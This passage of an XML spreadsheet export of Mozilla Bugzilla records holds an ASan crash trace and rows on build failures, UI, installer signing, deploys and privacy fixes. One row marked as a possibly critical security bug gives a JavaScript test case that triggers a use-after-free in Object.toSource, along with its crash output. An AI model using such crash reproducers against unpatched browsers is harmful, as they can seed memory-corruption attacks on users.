    #24 0x7f21c2395f7c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #25 0x7f21b9255852 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, unsigned int) src/netwerk/base/src/nsLoadGroup.cpp:698
    #26 0x7f21b924c2bc in nsLoadGroup::Cancel(unsigned int) src/netwerk/base/src/nsLoadGroup.cpp:304
    #27 0x7f21c238eeef in nsDocLoader::Stop() src/uriloader/base/nsDocLoader.cpp:328
    #28 0x7f21c2319965 in nsDocShell::Stop() src/docshell/base/nsDocShell.h:189
    #29 0x7f21c2267db7 in nsDocShell::Stop(unsigned int) src/docshell/base/nsDocShell.cpp:4541
previously allocated by thread T0 here:
    #0 0x4c3ef0 in __interceptor_malloc ??:0
    #1 0x7f21d2f849d2 in moz_malloc src/memory/mozalloc/mozalloc.cpp:67
    #2 0x7f21c591245d in PL_DHashAllocTable src/objdir-ff-asan-sym/xpcom/build/pldhash.cpp:82
    #3 0x7f21c5914bd3 in PL_DHashTableInit src/objdir-ff-asan-sym/xpcom/build/pldhash.cpp:229
    #4 0x7f21c0d4e36c in nsTHashtable&lt;nsSMILCompositor&gt;::Init(unsigned int, mozilla::fallible_t const&amp;) src/../../dist/include/nsTHashtable.h:414
    #5 0x7f21c0d45e25 in nsTHashtable&lt;nsSMILCompositor&gt;::Init(unsigned int) src/../../dist/include/nsTHashtable.h:98
    #6 0x7f21c0d435d1 in nsSMILAnimationController::DoSample(bool) src/content/smil/nsSMILAnimationController.cpp:413
    #7 0x7f21baadbc47 in nsSMILAnimationController::Resample() src/../../../../dist/include/nsSMILAnimationController.h:66
    #8 0x7f21baa4930d in nsSMILAnimationController::FlushResampleRequests() src/../../../../dist/include/nsSMILAnimationController.h:84
    #9 0x7f21baa47fbe in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3846
    #10 0x7f21baaea5e7 in nsRefreshDriver::Notify(nsITimer*) src/layout/base/nsRefreshDriver.cpp:378
    #11 0x7f21c5ca0de6 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:476
    #12 0x7f21c5ca25d8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #13 0x7f21c5c659ce in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #14 0x7f21c5906e27 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #15 0x7f21c46e3595 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #16 0x7f21c5f12bd9 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #17 0x7f21c5f12a22 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #18 0x7f21c5f12907 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #19 0x7f21c3bad7ae in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #20 0x7f21c281e448 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #21 0x7f21b90259b0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3800
    #22 0x7f21b902bc24 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3877
    #23 0x7f21b902ecef in XRE_main src/toolkit/xre/nsAppRunner.cpp:3953
Shadow byte and word:
  0x1fe432fb52ba: fd
  0x1fe432fb52b8: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe432fb5298: fd fd fd fd fd fd fd fd
  0x1fe432fb52a0: fd fd fd fd fd fd fd fd
  0x1fe432fb52a8: fd fd fd fd fd fd fd fd
  0x1fe432fb52b0: fd fd fd fd fd fd fd fd
=&gt;0x1fe432fb52b8: fd fd fd fd fd fd fd fd
  0x1fe432fb52c0: fd fd fd fd fd fd fd fd
  0x1fe432fb52c8: fd fd fd fd fd fd fd fd
  0x1fe432fb52d0: fd fd fd fd fd fd fd fd
  0x1fe432fb52d8: fd fd fd fd fd fd fd fd
Stats: 220M malloced (219M for red zones) by 289499 calls
Stats: 41M realloced by 14348 calls
Stats: 192M freed by 181706 calls
Stats: 57M really freed by 116880 calls
Stats: 412M (105547 full pages) mmaped in 103 calls
  mmaps   by size class: 8:196596; 9:40955; 10:16380; 11:14329; 12:2048; 13:1536; 14:1280; 15:256; 16:320; 17:1248; 18:160; 19:40; 20:16;
  mallocs by size class: 8:205900; 9:44146; 10:15477; 11:16402; 12:2266; 13:1677; 14:1399; 15:305; 16:403; 17:1293; 18:173; 19:41; 20:17;
  frees   by size class: 8:114002; 9:35563; 10:12435; 11:13502; 12:1490; 13:1439; 14:1233; 15:266; 16:306; 17:1281; 18:136; 19:39; 20:14;
  rfrees  by size class: 8:78488; 9:19256; 10:8038; 11:9093; 12:676; 13:448; 14:316; 15:147; 16:183; 17:201; 18:28; 19:5; 20:1;
Stats: malloc large: 1524 small slow: 1617
==10320== ABORTING</t>
        </is>
      </c>
      <c r="X5264" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5265">
      <c r="A5265" t="n">
        <v>1196193</v>
      </c>
      <c r="B5265" t="inlineStr">
        <is>
          <t>2015-08-19 03:29:25 -0700</t>
        </is>
      </c>
      <c r="C5265" t="inlineStr">
        <is>
          <t>Intermittent Read the Docs "Top-level Build Failure: __init__() takes exactly 2 arguments (1 given)"</t>
        </is>
      </c>
      <c r="D5265" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E5265" t="n">
        <v>1</v>
      </c>
      <c r="F5265" t="n">
        <v>1</v>
      </c>
      <c r="G5265" t="n">
        <v>7</v>
      </c>
      <c r="H5265" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5265" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5265" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5265" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5265" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5265" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5265" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5265" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5265" t="inlineStr"/>
      <c r="Q5265" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R5265" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5265" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5265" t="n">
        <v>1</v>
      </c>
      <c r="U5265" t="n">
        <v>0</v>
      </c>
      <c r="V5265" t="n">
        <v>2</v>
      </c>
      <c r="W5265" t="inlineStr">
        <is>
          <t>Only occurs intermittently, eg:
https://readthedocs.org/builds/treeherder/3256061/
https://readthedocs.org/builds/treeherder/3223958/
https://readthedocs.org/builds/treeherder/3223481/
https://readthedocs.org/builds/treeherder/3219551/
https://readthedocs.org/builds/treeherder/3210710/
If a new build is manually triggered it then succeeds.
I believe this is a problem on RTD's side, have filed:
https://github.com/rtfd/readthedocs.org/issues/1572</t>
        </is>
      </c>
      <c r="X5265" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5266">
      <c r="A5266" t="n">
        <v>1177161</v>
      </c>
      <c r="B5266" t="inlineStr">
        <is>
          <t>2015-06-24 11:51:33 -0700</t>
        </is>
      </c>
      <c r="C5266" t="inlineStr">
        <is>
          <t>[Control Center] More Information button needs to move to the bottom when expanding a subview</t>
        </is>
      </c>
      <c r="D5266" t="inlineStr">
        <is>
          <t>2016-05-10 09:11:42 -0700</t>
        </is>
      </c>
      <c r="E5266" t="n">
        <v>1</v>
      </c>
      <c r="F5266" t="n">
        <v>1</v>
      </c>
      <c r="G5266" t="n">
        <v>2</v>
      </c>
      <c r="H5266" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5266" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5266" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5266" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5266" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5266" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5266" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5266" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q5266" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5266" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5266" t="inlineStr">
        <is>
          <t>Firefox 41</t>
        </is>
      </c>
      <c r="T5266" t="n">
        <v>1</v>
      </c>
      <c r="U5266" t="n">
        <v>0</v>
      </c>
      <c r="V5266" t="n">
        <v>6</v>
      </c>
      <c r="W5266" t="inlineStr">
        <is>
          <t>Talked to Steven and he said that the "More Information" button needs to move to the bottom of the panel when it extends to show a subview.</t>
        </is>
      </c>
      <c r="X5266" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5267">
      <c r="A5267" t="n">
        <v>1458884</v>
      </c>
      <c r="B5267" t="inlineStr">
        <is>
          <t>2018-05-03 06:35:06 -0700</t>
        </is>
      </c>
      <c r="C5267" t="inlineStr">
        <is>
          <t>Sign the MozillaBuild 3.2 installer</t>
        </is>
      </c>
      <c r="D5267" t="inlineStr">
        <is>
          <t>2023-04-11 13:29:36 -0700</t>
        </is>
      </c>
      <c r="E5267" t="n">
        <v>1</v>
      </c>
      <c r="F5267" t="n">
        <v>1</v>
      </c>
      <c r="G5267" t="n">
        <v>7</v>
      </c>
      <c r="H5267" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5267" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5267" t="inlineStr">
        <is>
          <t>MozillaBuild</t>
        </is>
      </c>
      <c r="K5267" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5267" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5267" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5267" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5267" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5267" t="inlineStr"/>
      <c r="Q5267" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5267" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5267" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5267" t="n">
        <v>1</v>
      </c>
      <c r="U5267" t="n">
        <v>0</v>
      </c>
      <c r="V5267" t="n">
        <v>3</v>
      </c>
      <c r="W5267" t="inlineStr">
        <is>
          <t>The final MozillaBuild 3.2 installer is ready for signing.
Link: https://drive.google.com/open?id=1R3c0UfE1zchJDz-tqXrh2b9Id2wmmKN6
sha256: 4353e4b5b41c75a697dc3ba81cda91e2ce5e806aa278cf33c9bffae67a8a5047
sha512: 1a16730a830efc5131682c80edc114e7e3988d5983578db4db4fb0ed7a679ed3ec20f02e2d0dc130d589ae9142796a3f2356ca89e48636e5bc87eab4c78ca3f1
I've also run it through VirusTotal and verified that it comes up clean:
https://www.virustotal.com/#/file/4353e4b5b41c75a697dc3ba81cda91e2ce5e806aa278cf33c9bffae67a8a5047/detection</t>
        </is>
      </c>
      <c r="X5267" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5268">
      <c r="A5268" t="n">
        <v>209033</v>
      </c>
      <c r="B5268" t="inlineStr">
        <is>
          <t>2003-06-11 05:24:11 -0700</t>
        </is>
      </c>
      <c r="C5268" t="inlineStr">
        <is>
          <t>(Shockwave, Flash, ?) all typed letters (from kbd) appear TWICE in dialog windows</t>
        </is>
      </c>
      <c r="D5268" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5268" t="n">
        <v>1</v>
      </c>
      <c r="F5268" t="n">
        <v>1</v>
      </c>
      <c r="G5268" t="n">
        <v>6</v>
      </c>
      <c r="H5268" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5268" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5268" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5268" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5268" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M5268" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5268" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5268" t="inlineStr">
        <is>
          <t>[adt1]</t>
        </is>
      </c>
      <c r="Q5268" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5268" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5268" t="inlineStr">
        <is>
          <t>mozilla1.4final</t>
        </is>
      </c>
      <c r="T5268" t="n">
        <v>1</v>
      </c>
      <c r="U5268" t="n">
        <v>0</v>
      </c>
      <c r="V5268" t="n">
        <v>31</v>
      </c>
      <c r="W5268" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4) Gecko/20030529
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4) Gecko/20030529
Once connected to a given "play room", any text that is typed from the keyboard
is wrongly echoed twice on the screen.
For instance, typed text "hello" is displayed (and recorded) as "hheellllo".
Reproducible: Always
Steps to Reproduce:
1. connect to http://www.isketch.net/isketch.shtml
2. define arbitrary username (i.e. toto356)
3. check that this username already appears as "ttoottoo335566"
4. etc.
Actual Results:  
Same problem happens for any given typed text.
Expected Results:  
Only echoes once each single letter.
none</t>
        </is>
      </c>
      <c r="X5268" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5269">
      <c r="A5269" t="n">
        <v>668079</v>
      </c>
      <c r="B5269" t="inlineStr">
        <is>
          <t>2011-06-28 15:52:30 -0700</t>
        </is>
      </c>
      <c r="C5269" t="inlineStr">
        <is>
          <t>Please add fx-team project branch to self-serve</t>
        </is>
      </c>
      <c r="D5269" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5269" t="n">
        <v>1</v>
      </c>
      <c r="F5269" t="n">
        <v>1</v>
      </c>
      <c r="G5269" t="n">
        <v>5</v>
      </c>
      <c r="H5269" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5269" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5269" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5269" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5269" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5269" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5269" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5269" t="inlineStr"/>
      <c r="Q5269" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5269" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5269" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5269" t="n">
        <v>1</v>
      </c>
      <c r="U5269" t="n">
        <v>0</v>
      </c>
      <c r="V5269" t="n">
        <v>2</v>
      </c>
      <c r="W5269" t="inlineStr">
        <is>
          <t>I would have just smoothly segued from my claim that the second Linux debug build would be green to claiming that it's actually the third Linux debug build which would be green, except I wasn't able to trigger the third to cover my tracks.</t>
        </is>
      </c>
      <c r="X5269" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5270">
      <c r="A5270" t="n">
        <v>1549394</v>
      </c>
      <c r="B5270" t="inlineStr">
        <is>
          <t>2019-05-06 07:16:38 -0700</t>
        </is>
      </c>
      <c r="C5270" t="inlineStr">
        <is>
          <t>Potential privacy leak from Win10 keyboard autocomplete of data entered in Private Browsing</t>
        </is>
      </c>
      <c r="D5270" t="inlineStr">
        <is>
          <t>2020-01-07 08:51:44 -0800</t>
        </is>
      </c>
      <c r="E5270" t="n">
        <v>1</v>
      </c>
      <c r="F5270" t="n">
        <v>1</v>
      </c>
      <c r="G5270" t="n">
        <v>3</v>
      </c>
      <c r="H5270" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5270" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5270" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K5270" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5270" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5270" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5270" t="inlineStr">
        <is>
          <t>[adv-main72+]</t>
        </is>
      </c>
      <c r="Q5270" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5270" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5270" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T5270" t="n">
        <v>1</v>
      </c>
      <c r="U5270" t="n">
        <v>0</v>
      </c>
      <c r="V5270" t="n">
        <v>21</v>
      </c>
      <c r="W5270" t="inlineStr">
        <is>
          <t>Chrome is expected to fix a privacy leak from Incognito mode to normal browsing via the keyboard learning autocomplete data and exposing it in the normal browsing context.  See https://hothardware.com/news/micrsoft-chromium-fixes (latter part).
Basically, we should be using IS_PRIVATE as the input scope in Private Browsing on windows to avoid the Win10 keyboard from learning from input and offering as corrections or autocomplete data when we're not in Private Browsing.
See https://docs.microsoft.com/en-us/windows/desktop/api/inputscope/ne-inputscope-inputscope</t>
        </is>
      </c>
      <c r="X5270" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5271">
      <c r="A5271" t="n">
        <v>787558</v>
      </c>
      <c r="B5271" t="inlineStr">
        <is>
          <t>2012-08-31 14:07:22 -0700</t>
        </is>
      </c>
      <c r="C5271" t="inlineStr">
        <is>
          <t>[redesign] KB contributor pages (editing, l10n, history,...)</t>
        </is>
      </c>
      <c r="D5271" t="inlineStr">
        <is>
          <t>2012-09-04 12:29:27 -0700</t>
        </is>
      </c>
      <c r="E5271" t="n">
        <v>1</v>
      </c>
      <c r="F5271" t="n">
        <v>1</v>
      </c>
      <c r="G5271" t="n">
        <v>5</v>
      </c>
      <c r="H5271" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5271" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5271" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5271" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5271" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5271" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5271" t="inlineStr">
        <is>
          <t>u=contributor c=wiki p=2</t>
        </is>
      </c>
      <c r="Q5271" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5271" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5271" t="inlineStr">
        <is>
          <t>2012Q3</t>
        </is>
      </c>
      <c r="T5271" t="n">
        <v>1</v>
      </c>
      <c r="U5271" t="n">
        <v>0</v>
      </c>
      <c r="V5271" t="n">
        <v>4</v>
      </c>
      <c r="W5271" t="inlineStr">
        <is>
          <t>We need to make all the KB "Editing Tools" pages usable again. There are no designs, so we'll just make them work and look OK~ish. Later on we can prettify.
The pages are:
/kb/new
/kb/&lt;slug&gt;/edit
/kb/&lt;slug&gt;/locales
/kb/&lt;slug&gt;/history
/&lt;non en-US locale&gt;/kb/&lt;slug&gt;/translate
I am optimistically making this a 2pter and grabbing it.</t>
        </is>
      </c>
      <c r="X5271" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5272">
      <c r="A5272" t="n">
        <v>351973</v>
      </c>
      <c r="B5272" t="inlineStr">
        <is>
          <t>2006-09-09 14:21:46 -0700</t>
        </is>
      </c>
      <c r="C5272" t="inlineStr">
        <is>
          <t>GC hazard with unrooted ids in Object.toSource</t>
        </is>
      </c>
      <c r="D5272" t="inlineStr">
        <is>
          <t>2007-05-26 01:32:31 -0700</t>
        </is>
      </c>
      <c r="E5272" t="n">
        <v>1</v>
      </c>
      <c r="F5272" t="n">
        <v>1</v>
      </c>
      <c r="G5272" t="n">
        <v>3</v>
      </c>
      <c r="H5272" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5272" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5272" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5272" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5272" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5272" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5272" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5272" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5272" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5272" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5272" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5272" t="n">
        <v>1</v>
      </c>
      <c r="U5272" t="n">
        <v>0</v>
      </c>
      <c r="V5272" t="n">
        <v>20</v>
      </c>
      <c r="W5272" t="inlineStr">
        <is>
          <t>Consider the following example for js shell:
function removeAllProperties(o)
{
  for (var prop in o)
    delete o[prop];
  for (var i = 0; i != 50*1000; ++i) {
    var tmp = Math.sqrt(i+0.2);
    tmp = 0;
  }
  if (typeof gc == "function")
    gc();
}
function test()
{
  var o = {};
  o.first = { toSource: function() { removeAllProperties(o); } };
  for (var i = 0; i != 10; ++i) {
    o[Math.sqrt(i + 0.1)] = 1;
  }
  return o.toSource();
}
print(test());
When executed, it crashes the shell:
~/build/1.8.1/dbg/dist/bin&gt; run-mozilla.sh xpcshell ~/s/x.js
Type Manifest File: /home/igor/build/1.8.1/dbg/dist/bin/components/xpti.dat
nsNativeComponentLoader: autoregistering begins.
nsNativeComponentLoader: autoregistering succeeded
nsNativeComponentLoader: registering deferred (0)
before 913968, after 9232, break 08127000
./run-mozilla.sh: line 131: 10065 Segmentation fault      "$prog" ${1+"$@"}
The reason for the crash is that js_EnterSharpObject returns an array of property ids and nothing roots the atoms that can present in the array. 
Thus the GC triggered either through explicit gc() call (shell) or a branch callback (browser) would lead to accessing the freed memory in Object.toSource() when properties are removed during the string assembling loop.</t>
        </is>
      </c>
      <c r="X5272" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5273">
      <c r="A5273" t="n">
        <v>1540833</v>
      </c>
      <c r="B5273" t="inlineStr">
        <is>
          <t>2019-04-01 13:10:55 -0700</t>
        </is>
      </c>
      <c r="C5273" t="inlineStr">
        <is>
          <t>socorro deploy: 370 (pub/sub)</t>
        </is>
      </c>
      <c r="D5273" t="inlineStr">
        <is>
          <t>2019-04-01 15:47:12 -0700</t>
        </is>
      </c>
      <c r="E5273" t="n">
        <v>1</v>
      </c>
      <c r="F5273" t="n">
        <v>1</v>
      </c>
      <c r="G5273" t="n">
        <v>4</v>
      </c>
      <c r="H5273" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5273" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5273" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K5273" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5273" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5273" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5273" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5273" t="inlineStr"/>
      <c r="Q5273" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5273" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5273" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5273" t="n">
        <v>1</v>
      </c>
      <c r="U5273" t="n">
        <v>0</v>
      </c>
      <c r="V5273" t="n">
        <v>4</v>
      </c>
      <c r="W5273" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 370.
It consists of the following:
(current tag: 369 - `a3894cb`)
`075a9a1`: Redo FetchTransformSaveApp and queueing (willkg)
`9d8316a`: Fix docs; remove some extraneous code (willkg)
`7976b17`: Add missing blank line (willkg)
`97d571b`: Change Buildhub base URL (peterbe)
`86126c8`: bug 1527345: implement Pub/Sub queue and scaffolding (willkg)
`172155b`: Add Pub/Sub container to test environment (willkg)
`fccf38c`: Redo verifyprocessed to use concurrent futures (willkg)
`aaa875f`: bug 1536147: restructure archivescraper to use multiple processes (willkg)
`724909f`: bug 1527346: switch webapp to use Pub/Sub (willkg)
`04292ad`: Switch processor from RabbitMQ to Pub/Sub (willkg)
`2bcf8ac`: bug 1536903: add bulk process for missing processed crashes (willkg)
`c26ae6b`: bug 1527346: configure service_account_file for webapp (willkg)
`8549115`: bug 1400076: rework collector service to work right (willkg)
`7d0f45b`: bug 1527345: fix handling of "test" crash ids (willkg)
`76a99b3`: Minor fixes (willkg)
`27dc479`: bug 1527346: use credentials file when creating PublisherClient (willkg)
`db07e4a`: Switch to readthedocs config file (willkg)
`ba169f8`: bug 1536903: improve bulk processing performance (willkg)
`8eaca3d`: bug 1527345: fix PubSubCrashQueue iterator (willkg)
`e6e73a2`: bug 1536903: fix queryset for processing in admin (willkg)
`c49f1b5`: bug 1527345: reduce Pub/Sub pulling (willkg)
`753f5d0`: Add code of coduct file (willkg)
`3f64b40`: bug 1539272: switch to 3.6.8-slim-stretch (willkg)
`f513ab5`: bug 1539233: add is_processed bookkeeping field (willkg)
`13fc401`: bug 1539233: check if missing crashes have since been processed (willkg)
`7f88ecd`: bug 1540248: fix setting up docker-compose in CI (willkg)
(next tag: 370 - `f3dd390`)</t>
        </is>
      </c>
      <c r="X5273" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5274">
      <c r="A5274" t="n">
        <v>866825</v>
      </c>
      <c r="B5274" t="inlineStr">
        <is>
          <t>2013-04-29 11:13:49 -0700</t>
        </is>
      </c>
      <c r="C5274" t="inlineStr">
        <is>
          <t>nsDOMSVGZoomEvent::m{Previous,New}Scale are used uninitialized</t>
        </is>
      </c>
      <c r="D5274" t="inlineStr">
        <is>
          <t>2013-11-25 16:41:11 -0800</t>
        </is>
      </c>
      <c r="E5274" t="n">
        <v>1</v>
      </c>
      <c r="F5274" t="n">
        <v>1</v>
      </c>
      <c r="G5274" t="n">
        <v>3</v>
      </c>
      <c r="H5274" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5274" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5274" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K5274" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5274" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5274" t="inlineStr">
        <is>
